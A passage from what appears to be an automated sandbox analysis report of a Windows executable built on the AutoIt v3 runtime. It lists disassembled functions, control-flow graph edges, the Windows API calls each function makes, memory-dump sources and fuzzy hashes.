40ed7a-40ed84 996->999 1002 40eda4-40eda8 998->1002 1003 40ed98-40eda2 998->1003 1001 40edc1-40edc4 999->1001 1010 40edc6-40edc9 FreeLibrary 1001->1010 1011 40edcb-40edd3 1001->1011 1008 40edb6-40edbb 1002->1008 1009 40edaa-40edb4 1002->1009 1003->1001 1006 40ed70 1004->1006 1007 40ed6b-40ed6e FreeLibrary 1004->1007 1005->1004 1006->996 1007->1006 1008->1001 1009->1001 1010->1011
    APIs
    • GetVersionExW.KERNEL32(?,00000000,004679CC), ref: 0040EA94
    • GetCurrentProcess.KERNEL32(?), ref: 0040ED0B
    • GetNativeSystemInfo.KERNEL32(?), ref: 0040ED63
    • FreeLibrary.KERNEL32(?), ref: 0040ED6E
    • GetSystemInfo.KERNEL32(?), ref: 0040ED8A
    • FreeLibrary.KERNEL32(?), ref: 0040EDC9
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: FreeInfoLibrarySystem$CurrentNativeProcessVersion
    • String ID:
    • API String ID: 3962325948-0
    • Opcode ID: d127ffb4452bf4e9d334db1400e760b2031462e584861627734fd6057b285b28
    • Instruction ID: f2ba6a2bae675f251a30583b53330f3553dad9bf7d35c900dc6b7b295430e01b
    • Opcode Fuzzy Hash: d127ffb4452bf4e9d334db1400e760b2031462e584861627734fd6057b285b28
    • Instruction Fuzzy Hash: 3DA1FC30449298CDEF11DF69C4887D53FA49F25308F1844FADC499E29BC2BA9698C7B6
    Function 0043244B Relevance: .6, Instructions: 624COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: _strcat
    • String ID:
    • API String ID: 1765576173-0
    • Opcode ID: 3d6f8255cd7e0cf937bebd7bcd4f52b3dad16227f98c02302ad7f6935d22665e
    • Instruction ID: ad6fddf512afab15d5a1fa4b9b21ac99af1229bc60d9f9e6aa2c51089999b3cd
    • Opcode Fuzzy Hash: 3d6f8255cd7e0cf937bebd7bcd4f52b3dad16227f98c02302ad7f6935d22665e
    • Instruction Fuzzy Hash: 02423631600219DBCF28EF59CA81AED77B1BF08304F55512BF81997262C778ED86CB89
    Function 00404205 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 49registrywindowclipboardCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • GetSysColorBrush.USER32(0000000F), ref: 00404213
    • RegisterClassExW.USER32(?), ref: 0040425E
    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00404269
    • 6F5233E0.COMCTL32(00479BD8), ref: 00404284
    • 6F532980.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00404294
    • LoadIconW.USER32(00400000,000000A9), ref: 004042A8
    • 6F52C400.COMCTL32(0053EF80,000000FF,00000000), ref: 004042B7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Register$BrushC400ClassClipboardColorF5233F532980FormatIconLoad
    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
    • API String ID: 4082564816-1005189915
    • Opcode ID: fae248194e1b08d180a7888b94dd6c1f5fcc801a55d459cf83fb6d57dbcbcab5
    • Instruction ID: f45efb3e6643885d8ae29e22a69861e66850a50a293dcdb7155dbe3626e9ac17
    • Opcode Fuzzy Hash: fae248194e1b08d180a7888b94dd6c1f5fcc801a55d459cf83fb6d57dbcbcab5
    • Instruction Fuzzy Hash: 3A2164B1810308EFDB10DFA4D889BDEBBF4FB08726F00452AE642A62D1D7B59548CF54
    Function 0040165B Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 131windowCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 432 40165b-40166c 433 401676-401679 432->433 434 40166e-401670 432->434 436 401782-401789 433->436 437 40167f 433->437 434->433 435 40180f-401819 73A246C0 434->435 438 40181f-401822 435->438 441 4017fb-40180d call 4126bc 436->441 442 40178b-40178d 436->442 439 401685-401688 437->439 440 40174c-40177d call 42a895 call 42026c 437->440 444 401711-401736 SetTimer RegisterClipboardFormatW 439->444 445 40168e-40168f 439->445 440->435 441->435 450 4017cf-4017d1 441->450 446 4017eb-4017f9 call 4125ea 442->446 447 40178f-401794 442->447 449 40173c-401747 CreatePopupMenu 444->449 444->450 452 401691-401694 445->452 453 4016f2-40170c KillTimer call 412dd7 PostQuitMessage 445->453 446->450 455 4017d3-4017d9 447->455 456 401796-40179b 447->456 449->450 450->438 459 4016d1-4016ed MoveWindow 452->459 460 401696-401698 452->460 453->450 455->435 461 4017db-4017e9 call 401825 455->461 463 4017c1-4017ca call 412e32 456->463 464 40179d-4017a3 456->464 459->450 469 4016c0-4016cc SetFocus 460->469 470 40169a-40169d 460->470 461->435 463->450 464->435 472 4017a5-4017ac 464->472 469->450 470->464 473 4016a3-4016bb call 42a895 470->473 472->435 475 4017ae-4017bf call 412dd7 call 4128c6 472->475 473->450 475->435
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: A246Focus
    • String ID: TaskbarCreated
    • API String ID: 52732139-2362178303
    • Opcode ID: c7910e21aebc1e6a89a499fde730aec7c7ffe658abb426c78a0addb64026b91b
    • Instruction ID: f800d809c8c6698ce890321309edba9d95731fd3cb02d329e72dbe3815dc5fcc
    • Opcode Fuzzy Hash: c7910e21aebc1e6a89a499fde730aec7c7ffe658abb426c78a0addb64026b91b
    • Instruction Fuzzy Hash: D141FCB2514249EFDB26BF68DC449AA3A96B740305F18843BF505E32F1D67DCC64872E
    Function 0040127D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 76windowregistryCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • GetSysColorBrush.USER32(0000000F), ref: 00401287
    • LoadCursorW.USER32(00000000,00007F00), ref: 00401297
    • LoadIconW.USER32(000000A1), ref: 004012B2
    • LoadIconW.USER32(000000A4), ref: 004012C1
    • LoadImageW.USER32(000000A1,00000001,00000010,00000010,00000000), ref: 004012F9
    • RegisterClassExW.USER32(?), ref: 0040134D
      • Part of subcall function 00416168: EnumResourceNamesW.KERNEL32(00000000,0000000E,0041605B,000000A1,004012E6,000000A1), ref: 00416192
      • Part of subcall function 00416168: LoadImageW.USER32(000000A1,00000001,00000010,00000010,00000000,004012E6), ref: 004161B3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Load$IconImage$BrushClassColorCursorEnumNamesRegisterResource
    • String ID: #$0$AutoIt v3
    • API String ID: 3434626496-4155596026
    • Opcode ID: 372e31f16fea0fb377c9d9b2b166fb2a5c841b5732346904167e8dc8eb2c6d20
    • Instruction ID: 687afa9ac2c609e1a5e33ec6c472dbacfde120021dee70f4c48a98386cd57c87
    • Opcode Fuzzy Hash: 372e31f16fea0fb377c9d9b2b166fb2a5c841b5732346904167e8dc8eb2c6d20
    • Instruction Fuzzy Hash: 05314975D00318AFCB11DFA5EC88B9E7FB4EB48318F10447AE508AB3A1E3B45980CB59
    Function 004253C3 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 213COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 491 4253c3-4253e3 492 4253e5-4253e8 491->492 493 4253ea-4253ed 491->493 494 4253f0-425400 call 4184a9 492->494 493->494 497 425402-425405 494->497 498 42541e 494->498 499 425407-42540a 497->499 500 42540c-42540f 497->500 501 425422-425427 498->501 502 425412-42541c call 41858e 499->502 500->502 503 4254db-4254de 501->503 504 42542d 501->504 502->498 502->501 506 4254e0-4254e3 503->506 507 4254eb-4254ee 503->507 508 42542f-425436 504->508 509 4254f0-425590 call 4184a9 call 4497d7 call 414bbc call 414e6e call 449da6 call 44912a * 2 GetCurrentDirectoryW SetCurrentDirectoryW 506->509 507->509 511 425438-42543b 508->511 512 42543d-425441 508->512 555 425592-4255a1 call 414e55 509->555 556 4255d5 509->556 513 425446-425447 511->513 514 425443 512->514 515 425448-42544f 512->515 513->515 514->513 518 4254c1 515->518 519 425451-425455 515->519 522 4254c3-4254c6 518->522 519->518 521 425457-42545b 519->521 524 4254bc 521->524 525 42545d-425461 521->525 526 4254c8-4254cb 522->526 527 4254cd 522->527 529 4254be-4254bf 524->529 525->524 530 425463-425467 525->530 531 4254d0-4254d5 526->531 527->531 529->522 533 4254b8-4254ba 530->533 534 425469-42546d 530->534 531->503 531->508 533->529 534->533 536 42546f-425473 534->536 538 4254b4-4254b6 536->538 539 425475-425479 536->539 538->529 539->538 541 42547b-42547f 539->541 543 425481-425485 541->543 544 4254ad-4254b2 541->544 543->544 546 425487-42548b 543->546 544->522 548 4254a6-4254ab 546->548 549 42548d-425491 546->549 548->522 549->548 551 425493-425497 549->551 552 425499-42549d 551->552 553 42549f-4254a4 551->553 552->553 557 4254e5-4254e6 552->557 553->522 562 425602-425615 call 425639 555->562 563 4255a3-4255ca GetFileAttributesW SetFileAttributesW 555->563 558 4255d6-4255de call 418a14 556->558 557->558 567 425630-425636 558->567 571 42561a-42561c 562->571 565 4255e0-4255e4 563->565 566 4255cc-4255d3 SetCurrentDirectoryW 563->566 569 4255e6-425601 SetCurrentDirectoryW call 449154 565->569 570 425627-42562e SetCurrentDirectoryW 565->570 566->556 569->562 570->567 571->570 572 42561e-425622 call 418a14 571->572 572->570
    APIs
    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00425579
    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042558C
    • GetFileAttributesW.KERNEL32(?), ref: 004255AA
    • SetFileAttributesW.KERNEL32(?,00000000), ref: 004255C2
    • SetCurrentDirectoryW.KERNEL32(?), ref: 004255D3
    • SetCurrentDirectoryW.KERNEL32(?), ref: 004255ED
    • SetCurrentDirectoryW.KERNEL32(?,?,00000000,00000000,00000000), ref: 0042562E
      • Part of subcall function 00414E55: GetFileAttributesW.KERNEL32(?,00414BDE,?), ref: 00414E59
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CurrentDirectory$AttributesFile
    • String ID: *.*
    • API String ID: 769691225-438819550
    • Opcode ID: 3569008642355493b5f480c375d8291220e1eda45ba231d92b6f9314f4152cd2
    • Instruction ID: cec699d4ab6f872af63f9f09c0b7b1415ff4196bd1174d8bb20d814695fc6a34
    • Opcode Fuzzy Hash: 3569008642355493b5f480c375d8291220e1eda45ba231d92b6f9314f4152cd2
    • Instruction Fuzzy Hash: C171C975A00529AADB20FA54EC44BDAF378EB04316FD480ABE549D3140DB3C9EC68F59
    Function 00431B0A Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 256COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 576 431b0a-431b3c 577 431b42-431b45 576->577 578 431db4-431dbb 576->578 577->578 579 431b4b-431b4e 577->579 580 431dbd-431dc2 call 4309c0 578->580 579->578 581 431b54-431b5d call 4199de 579->581 583 431dc7-431dcb 580->583 586 431b5f-431b68 581->586 587 431b6d-431b74 581->587 586->580 588 431b76-431b7f 587->588 589 431b84-431b8f call 4493b8 587->589 588->580 592 431bd2 589->592 593 431b91-431bb3 call 416034 589->593 595 431bd5-431bed call 449170 592->595 599 431bb7-431bbc 593->599 600 431bef-431bf3 595->600 601 431c3c-431c4e 595->601 599->595 602 431bbe-431bcd call 449078 599->602 605 431bf6-431c0e call 4216bb call 4301fc 600->605 603 431c50-431c5a 601->603 604 431c5d-431c9a VariantInit call 449660 601->604 602->580 603->604 614 431c9e-431ca3 604->614 617 431c10-431c1a 605->617 618 431c1e-431c36 call 4309c0 605->618 615 431ca5-431caa 614->615 616 431cda-431cde 614->616 619 431cfd-431d04 615->619 620 431cac-431cd6 615->620 621 431ce0-431ce7 616->621 622 431d06-431d15 call 418b39 616->622 617->605 623 431c1c 617->623 618->601 630 431d76-431d78 618->630 627 431cf0-431cfb call 4309c0 619->627 620->616 621->619 625 431ce9-431ced 621->625 635 431d17-431d1a 622->635 636 431d69-431d73 VariantClear 622->636 623->601 625->627 627->636 632 431d97-431da4 call 449078 630->632 633 431d7a-431d7d 630->633 645 431da6-431dae call 449078 632->645 646 431daf-431db2 632->646 637 431d83-431d87 633->637 639 431d1e-431d32 call 4216bb 635->639 636->630 640 431d89-431d8c VariantClear 637->640 641 431d8e-431d95 VariantClear 637->641 647 431d53-431d54 call 4216bb 639->647 648 431d34-431d40 call 4216bb call 4186c7 639->648 640->641 641->632 641->637 645->646 646->583 654 431d59-431d5b call 418b39 647->654 658 431d60-431d67 648->658 659 431d42-431d51 call 4216bb call 4186c7 648->659 654->658 658->636 658->639 659->654
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID:
    • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
    • API String ID: 0-4206948668
    • Opcode ID: 77bb13909d2fe691890328682a43f0aad56dbfa7d6ca44aed54cefed339b0d1a
    • Instruction ID: 2bcbba87d7390d1434edf13330aba9ece891a3e4bcb3d2eb952acb4fb6b50e10
    • Opcode Fuzzy Hash: 77bb13909d2fe691890328682a43f0aad56dbfa7d6ca44aed54cefed339b0d1a
    • Instruction Fuzzy Hash: 10919E71A00309ABDF14DFA5CD85EEEB7B9AF08700F10511BF911A72A1D778AE40CB99
    Function 0040F71A Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 164registryCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040F781
    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 0040F815
    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 0040F83F
    • RegCloseKey.ADVAPI32(?), ref: 0040F92A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CloseFileModuleNameOpenQueryValue
    • String ID: Include$Software\AutoIt v3\AutoIt$\
    • API String ID: 3617018055-2276155026
    • Opcode ID: 57a98933405a528bc1f108303748af64036ba4879fad6c534aff9dd16fa15531
    • Instruction ID: 50f134da1176b66dbd367ed9ac3c4cf0d0d6e1090dbeac708e74059743c4f1f0
    • Opcode Fuzzy Hash: 57a98933405a528bc1f108303748af64036ba4879fad6c534aff9dd16fa15531
    • Instruction Fuzzy Hash: 60512BB2940718AFD720DFA5C88499BB7F8FF18704F5045AFE54AE3641E734AA44CB58
    Function 0041F7E3 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 208COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 779 41f7e3-41f819 call 449078 * 3 786 41f822-41f838 mciSendStringW 779->786 787 41f81b-41f81c 73A25CF0 779->787 788 41f83a 786->788 789 41f88c-41f894 786->789 787->786 790 41f840-41f84b call 4217b7 788->790 791 41f896 789->791 792 41f90d-41f915 789->792 804 41f883-41f88a 790->804 805 41f84d-41f873 call 4217b7 UnregisterHotKey call 4217b7 790->805 796 41f89c-41f8a7 call 4217b7 791->796 793 41f944-41f94c 792->793 794 41f917 792->794 800 41f96b-41f97f call 449078 793->800 801 41f94e 793->801 797 41f91d-41f928 call 4217b7 794->797 812 41f904-41f90b 796->812 813 41f8a9-41f8ba call 4217b7 796->813 819 41f93b-41f942 797->819 820 41f92a-41f935 call 4217b7 FreeLibrary 797->820 817 41f981-41f986 800->817 818 41f997-41f999 call 43138d 800->818 807 41f950-41f969 call 449078 801->807 804->789 804->790 833 41f881 805->833 834 41f875-41f880 call 41fadb call 449078 805->834 807->800 812->792 812->796 828 41f8bc-41f8cd call 4217b7 call 413e1f 813->828 829 41f8cf-41f8f2 call 4217b7 FindClose call 4217b7 call 449078 813->829 823 41f990-41f996 call 449078 817->823 824 41f988-41f98e 817->824 832 41f99e-41fad8 call 4183f6 call 4217e3 call 449078 * 2 call 402a77 call 403d37 call 4034b2 call 4183f6 * 2 call 42179e call 421785 call 42176c call 4216e8 call 40ee65 call 449078 call 4183f6 call 413a55 call 449078 * 10 call 4108ce 818->832 819->793 819->797 820->819 823->818 824->818 854 41f8f3-41f903 call 4217b7 call 449078 828->854 829->854 833->804 834->833 854->812
    APIs
    • 73A25CF0.USER32(?), ref: 0041F81C
    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0041F82A
    • UnregisterHotKey.USER32(?), ref: 0041F860
    • FindClose.KERNEL32(?), ref: 0041F8D9
    • FreeLibrary.KERNEL32(00000000), ref: 0041F935
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CloseFindFreeLibrarySendStringUnregister
    • String ID: close all
    • API String ID: 3080552100-3243417748
    • Opcode ID: b9280a75a0d9f507fc8712bebc7b43ef7d74a75ebad66014674356505a84a988
    • Instruction ID: 3646f2384ccb1e0e64c597d038a8f1cfb5bbf3df6652e1d2dd11040289734faa
    • Opcode Fuzzy Hash: b9280a75a0d9f507fc8712bebc7b43ef7d74a75ebad66014674356505a84a988
    • Instruction Fuzzy Hash: 4F712F312401589BDB31BF26DC81AED7766AF91315F40017FF8099B172CF395E9ADA48
    Function 004200F5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 912 4200f5-42010b 913 42012a-420136 912->913 914 42010d-420125 call 41faee 912->914 915 420165-42016b 913->915 916 420138-420155 call 4323fe 913->916 921 420265-420269 914->921 920 4201d0-4201d6 915->920 916->915 925 420157-420160 call 421406 916->925 923 4201d8 920->923 924 42016d-420173 920->924 926 4201e6-4201f5 923->926 924->926 927 420175-420185 call 42003a 924->927 925->915 929 420200-42021f call 42a895 call 406ad8 926->929 930 4201f7-4201fe 926->930 935 420187-420190 call 42036e 927->935 936 4201da-4201e1 call 418a14 927->936 932 420263 929->932 943 420221-420240 call 42026c LockWindowUpdate KiUserCallbackDispatcher 929->943 930->932 932->921 935->920 944 420192-4201ad call 40fc6b 935->944 936->926 951 420256-420261 GetMessageW 943->951 949 4201b7-4201cb call 4320d3 944->949 950 4201af-4201b5 944->950 949->920 950->920 951->932 953 420242-420250 TranslateMessage DispatchMessageW 951->953 953->951
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: LoadString
    • String ID: OnAutoItStart
    • API String ID: 2948472770-779282396
    • Opcode ID: b7450ae3f2511fa549ad06ec8c8ef8b57f7694bac96b9a24d91e34451de1bce3
    • Instruction ID: 596ddb237f3c4dbc422733f4dbf707e667353c10c10091e38a87b0e8f6c63aa8
    • Opcode Fuzzy Hash: b7450ae3f2511fa549ad06ec8c8ef8b57f7694bac96b9a24d91e34451de1bce3
    • Instruction Fuzzy Hash: 0C410471B04229ABC715DB74AC84AFFB7ECFB05308F50412BE415D3243EB68AD1687A9
    Function 00401371 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 954 401371-4013e1 CreateWindowExW * 2 ShowWindow * 2
    APIs
    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000000), ref: 0040139F
    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004013C0
    • ShowWindow.USER32(00000000), ref: 004013D4
    • ShowWindow.USER32(00000000), ref: 004013DD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Window$CreateShow
    • String ID: AutoIt v3$edit
    • API String ID: 1584632944-3779509399
    • Opcode ID: 50910c52fbc06293d40c549713fca855e76ea37ac9ada999b4250cc0ee2bbbe8
    • Instruction ID: c1bcc58241d8bb41d686f4cc75eac745dfcef030c9692a37be27f8a629f86a69
    • Opcode Fuzzy Hash: 50910c52fbc06293d40c549713fca855e76ea37ac9ada999b4250cc0ee2bbbe8
    • Instruction Fuzzy Hash: D5F03AB11463747AE6321B536C08EEB2E5DEF867B9F110421F90892160E2A55950CAF9
    Function 0044BE98 Relevance: 9.1, APIs: 6, Instructions: 134COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
